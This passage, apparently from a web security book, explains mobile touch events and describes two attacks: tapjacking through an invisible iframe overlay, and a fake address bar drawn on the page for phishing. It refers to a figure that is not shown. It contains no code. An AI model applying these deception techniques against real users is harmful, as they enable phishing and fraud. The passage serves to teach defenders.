Smartphones like Apple’s iPhone provide a more advanced control method for the user: the touchscreen. From the point of view of an operating system (OS), the screen touch is actually an event; the OS of the mobile phone captures these events and takes appropriate actions.
For example, a touchscreen operation may correspond to the following events:
- Touchstart—occurs when the finger touches the screen
- Touchend—occurs when the finger leaves the screen
- Touchmove—occurs when the finger slides
- Touchcancel—occurs when the system cancels the touch event
By putting an invisible iframe cover on the current web page, and you can tapjack the user’s touchscreen operation.
As the space on the phone screen is limited, the mobile browser hides even the address bar. However, visual deception on the phone may happen much more easily.
On the left, the browser’s address bar is at the very top. The attacker, meanwhile, draws a fake address bar on the page. In the middle, the browser’s real address bar is autohidden, and there is only a fake address bar on the page. On the right is shown the normal hiding of the browser’s address bar. This attack for visual effects can be exploited for phishing and fraud. In December 2010,* it was found that Android systems implementing tapjacking can even modify the system’s security settings, and a demonstration was shown at the same time.
In the future, with more features of the browser developed for mobile devices, perhaps we will see many other ways of attacks.